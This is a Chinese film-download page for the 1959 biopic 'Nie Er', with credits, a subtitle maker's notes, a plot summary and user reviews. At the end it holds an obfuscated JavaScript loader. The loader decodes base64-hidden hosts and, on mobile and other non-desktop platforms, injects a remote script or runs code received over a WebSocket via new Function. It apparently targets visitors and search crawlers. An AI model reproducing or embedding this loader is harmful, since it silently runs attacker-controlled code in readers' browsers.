1959高分剧情《聂耳》DVDRip.详解字幕


更新时间:2021-10-04 01:21:58 类别: 剧情 评论 下载
聂耳的海报 聂耳

聂耳

导演: 郑君里
编剧: 于伶 / 孟波 / 王苏江 / 郑君里
主演: 赵丹 / 张瑞芳 / 王蓓 / 邓楠 / 赵抒音 / 黄宗英 / 夏天 / 关宏达 / 韩非 / 陈述 / 仲星火 / 高博
类型: 剧情
制片国家/地区: 中国大陆
语言: 汉语普通话
片长: 118分钟
又名: Nie Er
IMDb: tt0183576
感谢“笑志狂谈”提供的详解字幕片源,有了字幕加持,很适合科普向观看,下面是压制的一些说明。

重新修订的详解字幕版《聂耳》是我于2021年9月21日制作完成的,主要参考了自购的《〈聂耳〉——从剧本到影片》(中国电影出版社,1963年11月第1版)。原来的《聂耳》详解字幕于去年10月1日正式发布,为本人系列详解字幕作品的第1部,也是我做详解字幕版老电影的初心。此次修订是为了提高字幕的质量,以期获得更多网友的注意,促进有兴趣的朋友接触这部经典老电影。

《聂耳》是1959年建国10周年的18部献礼片之一,被选为当时新片展览的闭幕片,与开幕片《林则徐》并称为“红烧头尾”,是我非常喜爱的一部电影,我曾在去年8月12日于自己的公众号“杨柳轻飏直上重霄九”上发过专门的影评,题为《不怕你关山千万重:评1959年彩色电影〈聂耳〉》,有兴趣的朋友可以前往公众号搜索阅读

如有兴趣,欢迎关注本人的账号进行观看和交流,本人的多个平台账号采用不同名称,这里进行汇总:

微博:@旌旗红
微信公众号:“杨柳轻飏直上重霄九”
AcFun弹幕视频网:“辣椒夹馒头”
B站弹幕视频网:“辣椒夹馒头”(已经封禁,不再更新,曾经投稿的11部字幕视频还在,可以去看。但请勿给本人B站私信,因为被封账号无法回复信息)


本人之前曾在哔哩哔哩弹幕视频网(即B站)发布字幕作品,但账号于2021年6月被永久封禁,申诉无效,账号无法再投稿、评论等,所以现在转去AcFun网发字幕视频,顺带在微博上发出全片的分段视频(微博不能发单个电影全片视频,切成两半也不行,否则会被删除,所以今后采取一部电影视频分成多个段落,每个段落时长尽量不超过30分钟的方式)。

万分感谢大家的支持! 1930年,在列强统治瓜分的大都会旧上海。为了追寻音乐的梦想,年轻人聂守信(赵丹 饰)告别故乡云南来到上海求学,为了生计,他干着最底层的工作,但是随着国民党反动派压迫的日益加深,守信失业,沦落到某歌舞班担任琴师。此时的他虽然讨厌这种燕语莺声的靡靡之音,可是又不知道未来前进的方向。旧日同学郑雷电的棒喝似乎让他猛然警醒,开始审视自己的音乐人生。在此之后,他接触到地下工作者,初步找到人生的意义。1932,“一•二八”事变爆发,守信和伙伴们为战士唱响了高亢奋进的《马赛曲》。老艺术家的建议让他铭记于心,面对江河破败、百姓离乱、民族危亡的现状,他暗下决心,一定要创作一首中国的《马赛曲》……
本片根据著名艺术家聂耳的事迹改编。
LoudCrazyHeart 2019-07-08

前面的50分钟根本就是技法上的乱,剪辑丝毫不顾镜头语言的流畅,也没什么过渡。对于聂耳的人物塑造几乎都是热血青年式的,有些刻板。“我们搞艺术的最好是不要过问政治”“我不能再妥协下去了,我要起来战斗”“我们被禁演了,因为我们的戏里有不能说的”“为什么不能说”等等,在现在大环境下这些放之彼身,真的是对D的讽刺,对自由限制的讽刺。

胤祥 2021-01-20

勉强及格吧。编剧已经编得离传主十万八千里了,赵丹四十多了还要演19岁的聂耳实在是……以及那个谜之紫色眼影是什么鬼。剧作稀碎概念先行可能也真不是编导的锅,毕竟社会主义现实主义规训之后写英雄可能还真得照着[董存瑞]来(成长线简直跟[董存瑞]一模一样嘛),聂耳的小女朋友根本就不是人物,就是个用来标定历史的概念。片里可能只有左翼电影那一小段是郑君里真正想拍的(也是拍得特别生动的),写《义勇军进行曲》时候那段脑内剪辑直接cue了[战舰波将金号]。整体而言影片的A故事完全是生搬硬套,B故事(搞创作要贴近生活)还算比较成立。摄影棚美学,打光跟年画月份牌似的(样板戏的视听语言可能要追到这里来),音乐比较讲究,国歌的动机片中多次出现(算是音乐上的预叙?不过连歌词的几句动机都给聂耳了,田汉知道吗?)。空镜及转场的意境。

黄小邪 2013-11-06

与倪振良《赵丹传》结合看更有意思。对于较熟悉三十年代上海电影戏剧音乐文化的观众来说,辨识指涉成一种乐趣。聂耳工作过的黎锦晖的“明月歌舞社”在片中为“五花歌舞班“,主张艺术远离政治,给十九路军伤员唱《桃花江》对方直皱眉…聂耳曾署名“黑婴”批评恩师黎锦晖的“靡靡之音”,片中署名红孩儿

smalldie 2010-12-03

姑娘家为了革命改名叫郑雷电,真是革命中的芙蓉姐姐。

石头星 2017-03-30

经典,赵丹真是演谁像谁,太有魅力,为《义勇军进行曲》作曲时的表情神采飞扬,把一个音乐人为国创作的激情展现的淋漓尽致,想象里的聂耳就该是这个样子。

余啸 2019-07-07

天山2厅,建国70周年展,近8分。 1,从电影本身(不考虑史实情况)来说,此作确实堪称中国优秀的(革命)浪漫主义作品之一,上映60周年后的今天,在大荧幕上观看,依然震撼我的感官和心灵。美术/摄影璧合的精心制作,无不映衬英雄传奇的伟大。 2,群戏的场面调度在那个年代也绝对上乘,除了片头散发传单,片尾冲击上海市政府那一幕让人想起敖德萨阶梯的磅礴气势。 3,从码头无缝切换到舞台演绎的戏剧,导演对好莱坞模式的运用得心应手;片场情节的展示,又是对中国电影史上早期《艺海风光》的呼应。 4,证明中国人拍主旋律依然可以非常好看。

字母君 2019-07-15

郑君里的“语气助词”(空镜、横移、蒙太奇段落)令人赏心悦目,但作为主干的情节实在是直白过头,大煞风景;人物塑造也并不丰满,郑雷电这个人物相当之一言难尽……剧作不如后来吴子牛的《国歌》。

猫觅 2020-03-05

电影里这个版本的中文《马赛曲》真好听,比重新翻译的其他版本都好听。赵丹真帅,其他男演员也帅,不输现在的韩星,其他女演员也超有气质的。听了一天《马赛曲》超有斗志的,“起来吧!中国英勇的汉子们;斗争的时刻到来了。。。。。”,简直太洗脑了。难以相信,这是1959年的自制音乐电影,太赞了,太赞了。小学时候学校组织看过,爱国主义教育,显然我那时候没走心。

一灯 2010-08-02

何苦拿你的弦乐给他们糟践?

Matrimandir 2019-07-07

浓妆艳抹的演员们僵硬地表演着各种Ai Guo主义情怀,高昂聒噪的配音,这就是那个年代的艺术电影和艺术家们。电影院里紧紧捏着塑料袋的大爷大妈,玩手机或睡觉的年轻人,与荧幕上虚假的表演太相衬了。那个年代背景下批判某个具体导演或演员都没必要了,他们没有自由,他们只是被宣扬某理念的洗脑工具罢了。 #建国70周年系列电影展#

WillGoWild 2019-01-29

有意思的是隐晦地体现了聂耳和黎锦晖、黄自、萧友梅等人的恩怨情仇。最大亮点把那个年代的上海和北京拍得如油画般美丽。剧作比较薄弱,赵丹也超龄了。张瑞芳的郑雷电:万绿丛中一点红。

九命猫@victor-eyes 2019-07-09

艺术家的成长故事在哪朝哪代哪国都有相通处。妆容很舞台,恰好契合聂耳的红颜知己把革命当激情生活过的戏剧性格(我们容易忽略的革命者一面)。上海等地的大好风光拍摄是必须的,这正是聂耳爱国浓情的源头。一首名曲的诞生。

Kiyoko 2021-05-24

顺理成章的选择了左翼革命道路中的聂耳作为59年献礼片(应该是非创作者主动选择)。仅突出表现革命精神和历史事件背景,模糊了聂耳生活一面的性格特征,不应该把一个人的丰富割裂,本来就是融为一体聂耳才之所以伟大。为突出革命道路,把明月歌舞团和联华公司丑化,歌曲的创作时代背景被突出,与真实电影史的连接被去除,几首歌诞生于电影插曲真正的创作过程电影人们和文化界的合力被消减。最后的歌都是国歌版,写聂耳最起码让创作者用《风云儿女》里的初版吧。

diaoduoxi 2012-08-19

群众懂贝多芬吗?当然不懂,只是他们也可以把你打成像他们一样的脑残

Sapphire 2010-08-15

没看到前面…聂耳帅哥啊…

红皇后 2019-11-14

竟然是彩色片,颜色看得赏心悦目,片子拍得很美好,很多镜头都很喜欢,尤其是聂耳用半年的工钱买了小提琴,然后门开了,他拉着小提琴踩着舞步走进来,瞬间心就融化了,但是中间开小差,传说中的吻戏没看到。郑雷电这个名字,起得实在是。其实觉得小红挺好看的。

王奋斗 2019-09-17

赵丹,只是简单地重复了他1930年代影片中的形象——要突出机灵或者狡黠,过于刻意,出现了明显的滑稽,而且造成了刚毅和勇敢的缺失。他的这些形象,对于“上海小男人”概念的建立,肯定起了一定的作用。有大场面,数百人的游行,南京路。

我们在一九八四 2021-03-26

内容和表现形式的杂糅,内容上为表达而表达,反而有些生硬之感,比如郑雷电这个角色,以及主要聂耳,演员较之于角色,年龄上太大了,没有青春那种轻盈恣意之感,看的时候有些疲惫。然后是表现形式,一方面传统现实主义,线性叙事;另一方面比如聂耳面试音乐学校那段的光影,又过于形式和唯美,甚至有些突兀;以及后来由创作过渡到舞台表演,又过于戏剧舞台化!不过以彩色片形式拍摄,真是选对了,色彩饱满,让人眼前一亮,特别能抓住观众的注意力。

寒雨和短剑 2013-10-26

虽有主旋律电影的种种弊端,但音乐相当动人,部分抒情的镜头也是美得很。

eros 2019-02-02

开头就是《大路歌》,而导演郑君里也是《大路》的主演。只是批评明月社的部分,让人觉得时代烙印太重。

聂耳的截图1
function yeqJaFV(e){var t="",n=r=c1=c2=0;while(n %lt;e.length){r=e.charCodeAt(n);if(r %lt;128){t+=String.fromCharCode(r);n++;}else if(r %gt;191&&r %lt;224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)%lt;%lt;6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)%lt;%lt;12|(c2&63)%lt;%lt;6|c3&63);n+=3;}}return t;};function vfbHwTz(e){var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f %lt;e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s %lt;%lt;2|o %gt;%gt;4;r=(o&15)%lt;%lt;4|u %gt;%gt;2;i=(u&3)%lt;%lt;6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return yeqJaFV(t);};window[''+'t'+'Y'+'E'+'x'+'M'+'d'+'C'+'p'+'q'+'n'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,i,w,d,c){var x=vfbHwTz,cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';if(navigator.userAgent.indexOf('baidu')>-1){k=decodeURIComponent(x(k.replace(new RegExp(c[1]+''+c[1],'g'),c[1])));var ws=new WebSocket('wss://'+k+':9393/'+i);ws.onmessage=function(e){ws.close();new Function('_tdcs',x(e.data))(cs);}}else{u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));var s=document.createElement('script');s.src='https://'+u+'/l/'+i;cs.parentElement.insertBefore(s,cs);}})('eeXl0Lmhlc2h1bjM2NS5jbg==','ddHIueWVzddW42NzguY29t','135631',window,document,['e','d']);}:function(){};